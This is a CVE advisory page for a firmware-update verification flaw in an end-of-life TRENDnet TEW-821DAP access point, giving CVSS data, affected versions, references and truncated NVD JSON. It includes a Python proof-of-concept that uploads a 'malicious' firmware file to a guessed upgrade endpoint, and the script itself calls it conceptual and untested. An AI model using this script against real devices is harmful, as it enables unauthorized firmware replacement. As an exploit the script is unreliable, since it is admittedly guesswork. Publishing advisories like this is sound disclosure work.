CVE-2026-7611

Description

A vulnerability was found in TRENDnet TEW-821DAP up to 1.12B01. This impacts the function platform_do_upgrade_cameo_dev of the file cameo_dev.sh of the component Firmware Update Handler. Performing a manipulation results in insufficient verification of data authenticity. The attack is possible to be carried out remotely. The complexity of an attack is rather high. The exploitability is said to be difficult. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score

3.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:trendnet:tew-821dap_firmware:1.12b01:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:trendnet:tew-821dap:1.0r:*:*:*:*:*:*:* - NOT VULNERABLE

TRENDnet TEW-821DAP <= 1.12B01

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2026-7611 - TRENDnet TEW-821DAP Firmware Update Verification Bypass
Note: This is a conceptual example based on the vulnerability description.
"""

import requests

TARGET_URL = "http://<TARGET_IP>/upgrade.cgi"  # Example endpoint
MALICIOUS_FIRMWARE_PATH = "./malicious_firmware.bin"

def exploit():
    # The vulnerability allows remote unauthenticated firmware updates
    # due to insufficient verification of data authenticity.
    
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; PoC/1.0)",
        "Content-Type": "multipart/form-data"
    }
    
    # Prepare the file payload
    files = {
        'file': ('firmware.bin', open(MALICIOUS_FIRMWARE_PATH, 'rb'), 'application/octet-stream')
    }
    
    try:
        print(f"[+] Sending malicious firmware to {TARGET_URL}...")
        response = requests.post(TARGET_URL, files=files, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if device is flashing.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Ensure you have a dummy file for testing structure
    with open(MALICIOUS_FIRMWARE_PATH, 'wb') as f:
        f.write(b'FAKE_FIRMWARE_PAYLOAD')
    
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7611
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7611
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7611/
[4] VulDB https://vuldb.com/cve/CVE-2026-7611
[5] https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_Inte.md
[6] https://vuldb.com/submit/806218
[7] https://vuldb.com/vuln/360568
[8] https://vuldb.com/vuln/360568/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7611", "sourceIdentifier": "[email protected]", "published": "2026-05-02T10:16:19.640", "lastModified": "2026-05-06T20:26:26.900", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A vulnerability was found in TRENDnet TEW-821DAP up to 1.12B01. This impacts the function platform_do_upgrade_cameo_dev of the file cameo_dev.sh of the component Firmware Update Handler. Performing a manipulation results in insufficient verification of data authenticity. The attack is possible to be carried out remotely. The complexity of an attack is rather high. The exploitability is said to be difficult. The vendor explains: \"That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling\". This vulnerability only affects products that are no longer supported by the maintainer."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-345"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:trendnet:tew-821dap_firmware:1.12b01:*:*:*:*:*:*:*", "matchCriteriaId": "34E80140-ACDC-44F3-95BE-37502705E835"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:trendnet:tew-821dap:1.0r:*:*:*:*:*:*:*", "matchCriteriaId": "0D9AF9FE-2A2E-4038-9AE2-CEF568877914"}]}]}], "references": [{"url": "https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_Inte.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/submit/806218", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/360568", "source": "[email protected]", "tags": ["Third Party Advisory", "VD ... (truncated)